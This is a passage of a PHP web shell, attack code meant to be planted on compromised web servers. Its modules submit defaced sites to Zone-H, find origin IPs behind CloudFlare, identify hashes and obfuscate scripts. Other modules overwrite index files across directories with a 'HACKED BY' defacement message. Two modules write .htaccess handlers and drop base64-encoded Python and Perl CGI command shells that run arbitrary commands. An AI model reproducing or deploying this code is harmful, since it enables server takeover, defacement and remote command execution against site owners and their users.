|
||
|
<option value="23" >Access credentials through Man In the Middle attack</option>
|
||
|
<option value="24" >Remote service password guessing</option>
|
||
|
<option value="25" >Remote service password bruteforce</option>
|
||
|
<option value="26" >Rerouting after attacking the Firewall</option>
|
||
|
<option value="27" >Rerouting after attacking the Router</option>
|
||
|
<option value="28" >DNS attack through social engineering</option>
|
||
|
<option value="29" >DNS attack through cache poisoning</option>
|
||
|
<option value="30" >Not available</option>
|
||
|
</select>
|
||
|
|
||
|
<select name="reason" class="inputz" >
|
||
|
<option >-------------Pilih Salah Satu---------------</option>
|
||
|
<option value="1" >Heh...just for fun!</option>
|
||
|
<option value="2" >Revenge against that website</option>
|
||
|
<option value="3" >Political reasons</option>
|
||
|
<option value="4" >As a challenge</option>
|
||
|
<option value="5" >I just want to be the best defacer</option>
|
||
|
<option value="6" >Patriotism</option>
|
||
|
<option value="7" >Not available</option>
|
||
|
</select>
|
||
|
<input type="hidden" name="action" value="zone">
|
||
|
<center><textarea style="background:black;outline:none;" name="domain" cols="116" rows="9" id="domains">List Of Domains</textarea>
|
||
|
<br /><input class='inputzbut' type="submit" value="Send Now !" name="SendNowToZoneH" /><br></center></table>
|
||
|
</form></td></tr></table></form>
|
||
|
<!-- End Of Zone-H -->
|
||
|
</td></center><br><br>
|
||
|
|
||
|
<?php
|
||
|
echo '<center>';
|
||
|
ob_start();
|
||
|
$sub = get_loaded_extensions();
|
||
|
if(!in_array("curl", $sub)){die('[-] Curl Is Not Supported !! ');}
|
||
|
$hacker = $_POST['defacer'];
|
||
|
$method = $_POST['hackmode'];
|
||
|
$neden = $_POST['reason'];
|
||
|
$site = $_POST['domain'];
|
||
|
|
||
|
if (empty($hacker)){die ("[-] You Must Fill the Attacker name !");}
|
||
|
elseif($method == "--------SELECT--------") {die("[-] You Must Select The Method !");}
|
||
|
elseif($neden == "--------SELECT--------") {die("[-] You Must Select The Reason");}
|
||
|
elseif(empty($site)) {die("[-] You Must Inter the Sites List ! ");}
|
||
|
$i = 0;
|
||
|
$sites = explode("\n", $site);
|
||
|
while($i < count($sites))
|
||
|
{
|
||
|
if(substr($sites[$i], 0, 4) != "http") {$sites[$i] = "http://".$sites[$i];}
|
||
|
ZoneH("http://zone-h.org/notify/single", $hacker, $method, $neden, $sites[$i]);
|
||
|
echo "Site : ".$sites[$i]." Defaced !\n";
|
||
|
++$i;
|
||
|
}
|
||
|
echo "[+] Sending Sites To Zone-H Has Been Completed Successfully !! ";
|
||
|
|
||
|
echo '</center>';
|
||
|
}
|
||
|
|
||
|
/////////////////////////////////////////////////////////////////////////////////////////////
|
||
|
elseif(isset($_GET['x']) && ($_GET['x'] == 'bypass-cf'))
|
||
|
{
|
||
|
echo '
|
||
|
<form method="POST"><br><br>
|
||
|
<center><p align="center" dir="ltr"><b><font size="5" face="Tahoma">+--=[ Bypass
|
||
|
<font color="#CC0000">CloudFlare</font> ]=--+</font></b></p>
|
||
|
<select class="inputz" name="krz">
|
||
|
<option>ftp</option>
|
||
|
<option>direct-conntect</option>
|
||
|
<option>webmail</option>
|
||
|
<option>cpanel</option>
|
||
|
</select>
|
||
|
<input class="inputz" type="text" name="target" value="url">
|
||
|
<input class="inputzbut" type="submit" value="Bypass"></center>
|
||
|
|
||
|
';
|
||
|
|
||
|
$target = $_POST['target'];
|
||
|
# Bypass From FTP
|
||
|
if($_POST['krz'] == "ftp") {
|
||
|
$ftp = gethostbyname("ftp."."$target");
|
||
|
echo "<br><p align='center' dir='ltr'><font face='Tahoma' size='2' color='#00ff00'>Correct
|
||
|
ip is : </font><font face='Tahoma' size='2' color='#F68B1F'>$ftp</font></p>";
|
||
|
}
|
||
|
# Bypass From Direct-Connect
|
||
|
if($_POST['krz'] == "direct-conntect") {
|
||
|
$direct = gethostbyname("direct-connect."."$target");
|
||
|
echo "<br><p align='center' dir='ltr'><font face='Tahoma' size='2' color='#00ff00'>Correct
|
||
|
ip is : </font><font face='Tahoma' size='2' color='#F68B1F'>$direct</font></p>";
|
||
|
}
|
||
|
# Bypass From Webmail
|
||
|
if($_POST['krz'] == "webmail") {
|
||
|
$web = gethostbyname("webmail."."$target");
|
||
|
echo "<br><p align='center' dir='ltr'><font face='Tahoma' size='2' color='#00ff00'>Correct
|
||
|
ip is : </font><font face='Tahoma' size='2' color='#F68B1F'>$web</font></p>";
|
||
|
}
|
||
|
# Bypass From Cpanel
|
||
|
if($_POST['krz'] == "cpanel") {
|
||
|
$cpanel = gethostbyname("cpanel."."$target");
|
||
|
echo "<br><p align='center' dir='ltr'><font face='Tahoma' size='2' color='#00ff00'>Correct
|
||
|
ip is : </font><font face='Tahoma' size='2' color='#F68B1F'>$cpanel</font></p>";
|
||
|
}
|
||
|
}
|
||
|
//////////////////////////////////////////////////////////////////////////////////////////////
|
||
|
|
||
|
|
||
|
|
||
|
//////////////////////////////////////////////////////////////////////////////////////////////
|
||
|
|
||
|
elseif(isset($_GET['x']) && ($_GET['x'] == 'hashid')) {
|
||
|
if(isset($_POST['gethash'])){
|
||
|
$hash = $_POST['hash'];
|
||
|
if(strlen($hash)==32){
|
||
|
$hashresult = "MD5 Hash";
|
||
|
}elseif(strlen($hash)==40){
|
||
|
$hashresult = "SHA-1 Hash/ /MySQL5 Hash";
|
||
|
}elseif(strlen($hash)==13){
|
||
|
$hashresult = "DES(Unix) Hash";
|
||
|
}elseif(strlen($hash)==16){
|
||
|
$hashresult = "MySQL Hash / /DES(Oracle Hash)";
|
||
|
}elseif(strlen($hash)==41){
|
||
|
$GetHashChar = substr($hash, 40);
|
||
|
if($GetHashChar == "*"){
|
||
|
$hashresult = "MySQL5 Hash";
|
||
|
}
|
||
|
}elseif(strlen($hash)==64){
|
||
|
$hashresult = "SHA-256 Hash";
|
||
|
}elseif(strlen($hash)==96){
|
||
|
$hashresult = "SHA-384 Hash";
|
||
|
}elseif(strlen($hash)==128){
|
||
|
$hashresult = "SHA-512 Hash";
|
||
|
}elseif(strlen($hash)==34){
|
||
|
if(strstr($hash, '$1$')){
|
||
|
$hashresult = "MD5(Unix) Hash";
|
||
|
}
|
||
|
}elseif(strlen($hash)==37){
|
||
|
if(strstr($hash, '$apr1$')){
|
||
|
$hashresult = "MD5(APR) Hash";
|
||
|
}
|
||
|
}elseif(strlen($hash)==34){
|
||
|
if(strstr($hash, '$H$')){
|
||
|
$hashresult = "MD5(phpBB3) Hash";
|
||
|
}
|
||
|
}elseif(strlen($hash)==34){
|
||
|
if(strstr($hash, '$P$')){
|
||
|
$hashresult = "MD5(Wordpress) Hash";
|
||
|
}
|
||
|
}elseif(strlen($hash)==39){
|
||
|
if(strstr($hash, '$5$')){
|
||
|
$hashresult = "SHA-256(Unix) Hash";
|
||
|
}
|
||
|
}elseif(strlen($hash)==39){
|
||
|
if(strstr($hash, '$6$')){
|
||
|
$hashresult = "SHA-512(Unix) Hash";
|
||
|
}
|
||
|
}elseif(strlen($hash)==24){
|
||
|
if(strstr($hash, '==')){
|
||
|
$hashresult = "MD5(Base-64) Hash";
|
||
|
}
|
||
|
}else{
|
||
|
$hashresult = "Hash type not found";
|
||
|
}
|
||
|
}else{
|
||
|
$hashresult = "Not Hash Entered";
|
||
|
}
|
||
|
|
||
|
?>
|
||
|
<center><br><Br><br>
|
||
|
|
||
|
<form action="" method="POST">
|
||
|
<tr>
|
||
|
<table class="tabnet">
|
||
|
<th colspan="5">Hash Identification</th>
|
||
|
<tr class="optionstr"><B><td>Enter Hash</td></b><td>:</td> <td><input type="text" name="hash" size='60' class="inputz" /></td><td><input type="submit" class="inputzbut" name="gethash" value="Identify Hash" /></td></tr>
|
||
|
<tr class="optionstr"><b><td>Result</td><td>:</td><td><?php echo $hashresult; ?></td></tr></b>
|
||
|
</table></tr></form>
|
||
|
</center>
|
||
|
|
||
|
<?php
|
||
|
}
|
||
|
//////////////////////////////////////////////////////////////////////////////////////////////
|
||
|
elseif(isset($_GET['x']) && ($_GET['x'] == 'python')) {
|
||
|
echo "<center/><br/><b>
|
||
|
+--==[ python Bypass Exploit ]==--+
|
||
|
</b><br><br>";
|
||
|
|
||
|
|
||
|
mkdir('python', 0755);
|
||
|
chdir('python');
|
||
|
$kokdosya = ".htaccess";
|
||
|
$dosya_adi = "$kokdosya";
|
||
|
$dosya = fopen ($dosya_adi , 'w') or die ("Dosya açılamadı!");
|
||
|
$metin = "AddHandler cgi-script .izo";
|
||
|
fwrite ( $dosya , $metin ) ;
|
||
|
fclose ($dosya);
|
||
|
$pythonp = 'IyEvdXNyL2Jpbi9weXRob24KIyAwNy0wNy0wNAojIHYxLjAuMAoKIyBjZ2ktc2hlbGwucHkKIyBB
|
||
|
IHNpbXBsZSBDR0kgdGhhdCBleGVjdXRlcyBhcmJpdHJhcnkgc2hlbGwgY29tbWFuZHMuCgoKIyBD
|
||
|
b3B5cmlnaHQgTWljaGFlbCBGb29yZAojIFlvdSBhcmUgZnJlZSB0byBtb2RpZnksIHVzZSBhbmQg
|
||
|
cmVsaWNlbnNlIHRoaXMgY29kZS4KCiMgTm8gd2FycmFudHkgZXhwcmVzcyBvciBpbXBsaWVkIGZv
|
||
|
ciB0aGUgYWNjdXJhY3ksIGZpdG5lc3MgdG8gcHVycG9zZSBvciBvdGhlcndpc2UgZm9yIHRoaXMg
|
||
|
Y29kZS4uLi4KIyBVc2UgYXQgeW91ciBvd24gcmlzayAhISEKCiMgRS1tYWlsIG1pY2hhZWwgQVQg
|
||
|
Zm9vcmQgRE9UIG1lIERPVCB1awojIE1haW50YWluZWQgYXQgd3d3LnZvaWRzcGFjZS5vcmcudWsv
|
||
|
YXRsYW50aWJvdHMvcHl0aG9udXRpbHMuaHRtbAoKIiIiCkEgc2ltcGxlIENHSSBzY3JpcHQgdG8g
|
||
|
ZXhlY3V0ZSBzaGVsbCBjb21tYW5kcyB2aWEgQ0dJLgoiIiIKIyMjIyMjIyMjIyMjIyMjIyMjIyMj
|
||
|
IyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIwojIEltcG9ydHMKdHJ5
|
||
|
OgogICAgaW1wb3J0IGNnaXRiOyBjZ2l0Yi5lbmFibGUoKQpleGNlcHQ6CiAgICBwYXNzCmltcG9y
|
||
|
dCBzeXMsIGNnaSwgb3MKc3lzLnN0ZGVyciA9IHN5cy5zdGRvdXQKZnJvbSB0aW1lIGltcG9ydCBz
|
||
|
dHJmdGltZQppbXBvcnQgdHJhY2ViYWNrCmZyb20gU3RyaW5nSU8gaW1wb3J0IFN0cmluZ0lPCmZy
|
||
|
b20gdHJhY2ViYWNrIGltcG9ydCBwcmludF9leGMKCiMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMj
|
||
|
IyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMKIyBjb25zdGFudHMKCmZvbnRs
|
||
|
aW5lID0gJzxGT05UIENPTE9SPSM0MjQyNDIgc3R5bGU9ImZvbnQtZmFtaWx5OnRpbWVzO2ZvbnQt
|
||
|
c2l6ZToxMnB0OyI+Jwp2ZXJzaW9uc3RyaW5nID0gJ1ZlcnNpb24gMS4wLjAgN3RoIEp1bHkgMjAw
|
||
|
NCcKCmlmIG9zLmVudmlyb24uaGFzX2tleSgiU0NSSVBUX05BTUUiKToKICAgIHNjcmlwdG5hbWUg
|
||
|
PSBvcy5lbnZpcm9uWyJTQ1JJUFRfTkFNRSJdCmVsc2U6CiAgICBzY3JpcHRuYW1lID0gIiIKCk1F
|
||
|
VEhPRCA9ICciUE9TVCInCgojIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMj
|
||
|
IyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjCiMgUHJpdmF0ZSBmdW5jdGlvbnMgYW5kIHZhcmlhYmxl
|
||
|
cwoKZGVmIGdldGZvcm0odmFsdWVsaXN0LCB0aGVmb3JtLCBub3RwcmVzZW50PScnKToKICAgICIi
|
||
|
IlRoaXMgZnVuY3Rpb24sIGdpdmVuIGEgQ0dJIGZvcm0sIGV4dHJhY3RzIHRoZSBkYXRhIGZyb20g
|
||
|
aXQsIGJhc2VkIG9uCiAgICB2YWx1ZWxpc3QgcGFzc2VkIGluLiBBbnkgbm9uLXByZXNlbnQgdmFs
|
||
|
dWVzIGFyZSBzZXQgdG8gJycgLSBhbHRob3VnaCB0aGlzIGNhbiBiZSBjaGFuZ2VkLgogICAgKGUu
|
||
|
Zy4gdG8gcmV0dXJuIE5vbmUgc28geW91IGNhbiB0ZXN0IGZvciBtaXNzaW5nIGtleXdvcmRzIC0g
|
||
|
d2hlcmUgJycgaXMgYSB2YWxpZCBhbnN3ZXIgYnV0IHRvIGhhdmUgdGhlIGZpZWxkIG1pc3Npbmcg
|
||
|
aXNuJ3QuKSIiIgogICAgZGF0YSA9IHt9CiAgICBmb3IgZmllbGQgaW4gdmFsdWVsaXN0OgogICAg
|
||
|
ICAgIGlmIG5vdCB0aGVmb3JtLmhhc19rZXkoZmllbGQpOgogICAgICAgICAgICBkYXRhW2ZpZWxk
|
||
|
XSA9IG5vdHByZXNlbnQKICAgICAgICBlbHNlOgogICAgICAgICAgICBpZiAgdHlwZSh0aGVmb3Jt
|
||
|
W2ZpZWxkXSkgIT0gdHlwZShbXSk6CiAgICAgICAgICAgICAgICBkYXRhW2ZpZWxkXSA9IHRoZWZv
|
||
|
cm1bZmllbGRdLnZhbHVlCiAgICAgICAgICAgIGVsc2U6CiAgICAgICAgICAgICAgICB2YWx1ZXMg
|
||
|
PSBtYXAobGFtYmRhIHg6IHgudmFsdWUsIHRoZWZvcm1bZmllbGRdKSAgICAgIyBhbGxvd3MgZm9y
|
||
|
IGxpc3QgdHlwZSB2YWx1ZXMKICAgICAgICAgICAgICAgIGRhdGFbZmllbGRdID0gdmFsdWVzCiAg
|
||
|
ICByZXR1cm4gZGF0YQoKCnRoZWZvcm1oZWFkID0gIiIiPEhUTUw+PEhFQUQ+PFRJVExFPmNnaS1z
|
||
|
aGVsbC5weSAtIGEgQ0dJIGJ5IEZ1enp5bWFuPC9USVRMRT48L0hFQUQ+CjxCT0RZPjxDRU5URVI+
|
||
|
CjxIMT5XZWxjb21lIHRvIGNnaS1zaGVsbC5weSAtIDxCUj5hIFB5dGhvbiBDR0k8L0gxPgo8Qj48
|
||
|
ST5CeSBGdXp6eW1hbjwvQj48L0k+PEJSPgoiIiIrZm9udGxpbmUgKyJWZXJzaW9uIDogIiArIHZl
|
||
|
cnNpb25zdHJpbmcgKyAiIiIsIFJ1bm5pbmcgb24gOiAiIiIgKyBzdHJmdGltZSgnJUk6JU0gJXAs
|
||
|
ICVBICVkICVCLCAlWScpKycuPC9DRU5URVI+PEJSPicKCnRoZWZvcm0gPSAiIiI8SDI+RW50ZXIg
|
||
|
Q29tbWFuZDwvSDI+CjxGT1JNIE1FVEhPRD1cIiIiIiArIE1FVEhPRCArICciIGFjdGlvbj0iJyAr
|
||
|
IHNjcmlwdG5hbWUgKyAiIiJcIj4KPGlucHV0IG5hbWU9Y21kIHR5cGU9dGV4dD48QlI+CjxpbnB1
|
||
|
dCB0eXBlPXN1Ym1pdCB2YWx1ZT0iU3VibWl0Ij48QlI+CjwvRk9STT48QlI+PEJSPiIiIgpib2R5
|
||
|
ZW5kID0gJzwvQk9EWT48L0hUTUw+JwplcnJvcm1lc3MgPSAnPENFTlRFUj48SDI+U29tZXRoaW5n
|
||
|
IFdlbnQgV3Jvbmc8L0gyPjxCUj48UFJFPicKCiMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMj
|
||
|
IyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMKIyBtYWluIGJvZHkgb2YgdGhlIHNj
|
||
|
cmlwdAoKaWYgX19uYW1lX18gPT0gJ19fbWFpbl9fJzoKICAgIHByaW50ICJDb250ZW50LXR5cGU6
|
||
|
IHRleHQvaHRtbCIgICAgICAgICAjIHRoaXMgaXMgdGhlIGhlYWRlciB0byB0aGUgc2VydmVyCiAg
|
||
|
ICBwcmludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIyBzbyBpcyB0aGlzIGJs
|
||
|
YW5rIGxpbmUKICAgIGZvcm0gPSBjZ2kuRmllbGRTdG9yYWdlKCkKICAgIGRhdGEgPSBnZXRmb3Jt
|
||
|
KFsnY21kJ10sZm9ybSkKICAgIHRoZWNtZCA9IGRhdGFbJ2NtZCddCiAgICBwcmludCB0aGVmb3Jt
|
||
|
aGVhZAogICAgcHJpbnQgdGhlZm9ybQogICAgaWYgdGhlY21kOgogICAgICAgIHByaW50ICc8SFI+
|
||
|
PEJSPjxCUj4nCiAgICAgICAgcHJpbnQgJzxCPkNvbW1hbmQgOiAnLCB0aGVjbWQsICc8QlI+PEJS
|
||
|
PicKICAgICAgICBwcmludCAnUmVzdWx0IDogPEJSPjxCUj4nCiAgICAgICAgdHJ5OgogICAgICAg
|
||
|
ICAgICBjaGlsZF9zdGRpbiwgY2hpbGRfc3Rkb3V0ID0gb3MucG9wZW4yKHRoZWNtZCkKICAgICAg
|
||
|
ICAgICAgY2hpbGRfc3RkaW4uY2xvc2UoKQogICAgICAgICAgICByZXN1bHQgPSBjaGlsZF9zdGRv
|
||
|
dXQucmVhZCgpCiAgICAgICAgICAgIGNoaWxkX3N0ZG91dC5jbG9zZSgpCiAgICAgICAgICAgIHBy
|
||
|
aW50IHJlc3VsdC5yZXBsYWNlKCdcbicsICc8QlI+JykKCiAgICAgICAgZXhjZXB0IEV4Y2VwdGlv
|
||
|
biwgZTogICAgICAgICAgICAgICAgICAgICAgIyBhbiBlcnJvciBpbiBleGVjdXRpbmcgdGhlIGNv
|
||
|
bW1hbmQKICAgICAgICAgICAgcHJpbnQgZXJyb3JtZXNzCiAgICAgICAgICAgIGYgPSBTdHJpbmdJ
|
||
|
TygpCiAgICAgICAgICAgIHByaW50X2V4YyhmaWxlPWYpCiAgICAgICAgICAgIGEgPSBmLmdldHZh
|
||
|
bHVlKCkuc3BsaXRsaW5lcygpCiAgICAgICAgICAgIGZvciBsaW5lIGluIGE6CiAgICAgICAgICAg
|
||
|
ICAgICBwcmludCBsaW5lCgogICAgcHJpbnQgYm9keWVuZAoKCiIiIgpUT0RPL0lTU1VFUwoKCgpD
|
||
|
SEFOR0VMT0cKCjA3LTA3LTA0ICAgICAgICBWZXJzaW9uIDEuMC4wCkEgdmVyeSBiYXNpYyBzeXN0
|
||
|
ZW0gZm9yIGV4ZWN1dGluZyBzaGVsbCBjb21tYW5kcy4KSSBtYXkgZXhwYW5kIGl0IGludG8gYSBw
|
||
|
cm9wZXIgJ2Vudmlyb25tZW50JyB3aXRoIHNlc3Npb24gcGVyc2lzdGVuY2UuLi4KIiIi';
|
||
|
|
||
|
$file = fopen("python.izo" ,"w+");
|
||
|
$write = fwrite ($file ,base64_decode($pythonp));
|
||
|
fclose($file);
|
||
|
chmod("python.izo",0755);
|
||
|
echo " <iframe src=python/python.izo width=96% height=76% frameborder=0></iframe>
|
||
|
|
||
|
</div>"; }
|
||
|
|
||
|
//////////////////////////////////////////////////////////////////////////////////////////////
|
||
|
elseif(isset($_GET['x']) && ($_GET['x'] == 'string')){
|
||
|
$text = $_POST['code'];
|
||
|
?><center><br><br><b>+--=[ Script Encode & Decode ]=--+</b><br><br>
|
||
|
<form method="post"><br><br><br>
|
||
|
<textarea class='inputz' cols=80 rows=10 name="code"></textarea><br><br>
|
||
|
<select class='inputz' size="1" name="ope">
|
||
|
<option value="base64">Base64</option>
|
||
|
<option value="gzinflate">str_rot13 - gzinflate - base64</option>
|
||
|
<option value="str">str_rot13 - gzinflate - str_rot13 - base64</option>
|
||
|
</select> <input class='inputzbut' type='submit' name='submit' value='Encrypt'>
|
||
|
<input class='inputzbut' type='submit' name='submits' value='Decrypt'>
|
||
|
</form>
|
||
|
|
||
|
<?php
|
||
|
$submit = $_POST['submit'];
|
||
|
if (isset($submit)){
|
||
|
$op = $_POST["ope"];
|
||
|
switch ($op) {case 'base64': $codi=base64_encode($text);
|
||
|
break;case 'str' : $codi=(base64_encode(str_rot13(gzdeflate(str_rot13($text)))));
|
||
|
break;case 'gzinflate' : $codi=base64_encode(gzdeflate(str_rot13($text)));
|
||
|
break;default:break;}}
|
||
|
|
||
|
$submit = $_POST['submits'];
|
||
|
if (isset($submit)){
|
||
|
$op = $_POST["ope"];
|
||
|
switch ($op) {case 'base64': $codi=base64_decode($text);
|
||
|
break;case 'str' : $codi=str_rot13(gzinflate(str_rot13(base64_decode(($text)))));
|
||
|
break;case 'gzinflate' : $codi=str_rot13(gzinflate(base64_decode($text)));
|
||
|
break;default:break;}}
|
||
|
|
||
|
echo '<textarea cols=80 rows=10 class="inputz" readonly>'.$codi.'</textarea></center><BR><BR>';
|
||
|
|
||
|
}
|
||
|
|
||
|
/////////////////////////////////////////////////////////////////////////////////////////////
|
||
|
|
||
|
elseif(isset($_GET['x']) && ($_GET['x'] == 'mass'))
|
||
|
{
|
||
|
echo "<center/><br/><b><font color=#00ff00>-=[ Mass Deface ]=-</font></b><br>";
|
||
|
error_reporting(0);?>
|
||
|
<form ENCTYPE="multipart/form-data" action="<?php $_SERVER['PHP_SELF']?>" method='post'>
|
||
|
<td><table><table class="tabnet" >
|
||
|
<form hethot='post'>
|
||
|
<tr>
|
||
|
<tr>
|
||
|
<td> Folder</td><td><input class ='inputz' type='text' name='path' size='60' value="<?php echo getcwd();?>"></td>
|
||
|
</tr><br>
|
||
|
<tr>
|
||
|
<td>file name</td><td><input class ='inputz' type='text' name='file' size='60' value="index.php"></td>
|
||
|
</tr>
|
||
|
</tr>
|
||
|
<th colspan='2'><b>Index code</b></th><br></table>
|
||
|
<textarea style='background:black;outline:none;' name='index' rows='10' cols='67'>HACKED BY X'1N73CT,PATCH YOUR SECURITY SYSTEM</textarea><br>
|
||
|
<center><input class='inputzbut' type='submit' value=" Deface "></center></form></table><br></form>
|
||
|
|
||
|
<?php $mainpath=$_POST[path];$file=$_POST[file];$dir=opendir("$mainpath");$code=base64_encode($_POST[index]);$indx=base64_decode($code);while($row=readdir($dir)){$start=@fopen("$row/$file","w+");$finish=@fwrite($start,$indx);if ($finish){echo "$row/$file > Done<br><br>";}}}
|
||
|
|
||
|
//////////////////////////////////////////////////////////////////////////////////////////////
|
||
|
|
||
|
elseif(isset($_GET['x']) && ($_GET['x'] == 'cgi')) {
|
||
|
echo "<center/><br/><b><font color=blue>+--==[ cgitelnet.v1 Bypass Exploit]==--+ </font></b><br><br>";
|
||
|
mkdir('cgitelnet1', 0755);
|
||
|
chdir('cgitelnet1');
|
||
|
$kokdosya = ".htaccess";
|
||
|
$dosya_adi = "$kokdosya";
|
||
|
$dosya = fopen ($dosya_adi , 'w') or die ("Dosya açılamadı!");
|
||
|
$metin = "Options FollowSymLinks MultiViews Indexes ExecCGI
|
||
|
|
||
|
AddType application/x-httpd-cgi .cin
|
||
|
|
||
|
AddHandler cgi-script .cin
|
||
|
AddHandler cgi-script .cin";
|
||
|
fwrite ( $dosya , $metin ) ;
|
||
|
fclose ($dosya);
|
||
|
$cgishellizocin = 'IyEvdXNyL2Jpbi9wZXJsCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0KIyBDb3B5cmlnaHQgYW5kIExpY2VuY2UKIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQojIENHSS1UZWxuZXQgVmVyc2lvbiAxLjAgZm9yIE5UIGFuZCBVbml4IDogUnVuIENvbW1hbmRzIG9uIHlvdXIgV2ViIFNlcnZlcgojCiMgQ29weXJpZ2h0IChDKSAyMDAxIFJvaGl0YWIgQmF0cmEKIyBQZXJtaXNzaW9uIGlzIGdyYW50ZWQgdG8gdXNlLCBkaXN0cmlidXRlIGFuZCBtb2RpZnkgdGhpcyBzY3JpcHQgc28gbG9uZwojIGFzIHRoaXMgY29weXJpZ2h0IG5vdGljZSBpcyBsZWZ0IGludGFjdC4gSWYgeW91IG1ha2UgY2hhbmdlcyB0byB0aGUgc2NyaXB0CiMgcGxlYXNlIGRvY3VtZW50IHRoZW0gYW5kIGluZm9ybSBtZS4gSWYgeW91IHdvdWxkIGxpa2UgYW55IGNoYW5nZXMgdG8gYmUgbWFkZQojIGluIHRoaXMgc2NyaXB0LCB5b3UgY2FuIGUtbWFpbCBtZS4KIwojIEF1dGhvcjogUm9oaXRhYiBCYXRyYQojIEF1dGhvciBlLW1haWw6IHJvaGl0YWJAcm9oaXRhYi5jb20KIyBBdXRob3IgSG9tZXBhZ2U6IGh0dHA6Ly93d3cucm9oaXRhYi5jb20vCiMgU2NyaXB0IEhvbWVwYWdlOiBodHRwOi8vd3d3LnJvaGl0YWIuY29tL2NnaXNjcmlwdHMvY2dpdGVsbmV0Lmh0bWwKIyBQcm9kdWN0IFN1cHBvcnQ6IGh0dHA6Ly93d3cucm9oaXRhYi5jb20vc3VwcG9ydC8KIyBEaXNjdXNzaW9uIEZvcnVtOiBodHRwOi8vd3d3LnJvaGl0YWIuY29tL2Rpc2N1c3MvCiMgTWFpbGluZyBMaXN0OiBodHRwOi8vd3d3LnJvaGl0YWIuY29tL21saXN0LwojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tCgojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tCiMgSW5zdGFsbGF0aW9uCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0KIyBUbyBpbnN0YWxsIHRoaXMgc2NyaXB0CiMKIyAxLiBNb2RpZnkgdGhlIGZpcnN0IGxpbmUgIiMhL3Vzci9iaW4vcGVybCIgdG8gcG9pbnQgdG8gdGhlIGNvcnJlY3QgcGF0aCBvbgojICAgIHlvdXIgc2VydmVyLiBGb3IgbW9zdCBzZXJ2ZXJzLCB5b3UgbWF5IG5vdCBuZWVkIHRvIG1vZGlmeSB0aGlzLgojIDIuIENoYW5nZSB0aGUgcGFzc3dvcmQgaW4gdGhlIENvbmZpZ3VyYXRpb24gc2VjdGlvbiBiZWxvdy4KIyAzLiBJZiB5b3UncmUgcnVubmluZyB0aGUgc2NyaXB0IHVuZGVyIFdpbmRvd3MgTlQsIHNldCAkV2luTlQgPSAxIGluIHRoZQojICAgIENvbmZpZ3VyYXRpb24gU2VjdGlvbiBiZWxvdy4KIyA0LiBVcGxvYWQgdGhlIHNjcmlwdCB0byBhIGRpcmVjdG9yeSBvbiB5b3VyIHNlcnZlciB3aGljaCBoYXMgcGVybWlzc2lvbnMgdG8KIyAgICBleGVjdXRlIENHSSBzY3JpcHRzLiBUaGlzIGlzIHVzdWFsbHkgY2dpLWJpbi4gTWFrZSBzdXJlIHRoYXQgeW91IHVwbG9hZAojICAgIHRoZSBzY3JpcHQgaW4gQVNDSUkgbW9kZS4KIyA1LiBDaGFuZ2UgdGhlIHBlcm1pc3Npb24gKENITU9EKSBvZiB0aGUgc2NyaXB0IHRvIDc1NS4KIyA2LiBPcGVuIHRoZSBzY3JpcHQgaW4geW91ciB3ZWIgYnJvd3Nlci4gSWYgeW91IHVwbG9hZGVkIHRoZSBzY3JpcHQgaW4KIyAgICBjZ2ktYmluLCB0aGlzIHNob3VsZCBiZSBodHRwOi8vd3d3LnlvdXJzZXJ2ZXIuY29tL2NnaS1iaW4vY2dpdGVsbmV0LnBsCiMgNy4gTG9naW4gdXNpbmcgdGhlIHBhc3N3b3JkIHRoYXQgeW91IHNwZWNpZmllZCBpbiBTdGVwIDIuCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0KCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0KIyBDb25maWd1cmF0aW9uOiBZb3UgbmVlZCB0byBjaGFuZ2Ugb25seSAkUGFzc3dvcmQgYW5kICRXaW5OVC4gVGhlIG90aGVyCiMgdmFsdWVzIHNob3VsZCB3b3JrIGZpbmUgZm9yIG1vc3Qgc3lzdGVtcy4KIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQokUGFzc3dvcmQgPSAiMTIzNDU2IjsJCSMgQ2hhbmdlIHRoaXMuIFlvdSB3aWxsIG5lZWQgdG8gZW50ZXIgdGhpcwoJCQkJIyB0byBsb2dpbi4KCiRXaW5OVCA9IDA7CQkJIyBZb3UgbmVlZCB0byBjaGFuZ2UgdGhlIHZhbHVlIG9mIHRoaXMgdG8gMSBpZgoJCQkJIyB5b3UncmUgcnVubmluZyB0aGlzIHNjcmlwdCBvbiBhIFdpbmRvd3MgTlQKCQkJCSMgbWFjaGluZS4gSWYgeW91J3JlIHJ1bm5pbmcgaXQgb24gVW5peCwgeW91CgkJCQkjIGNhb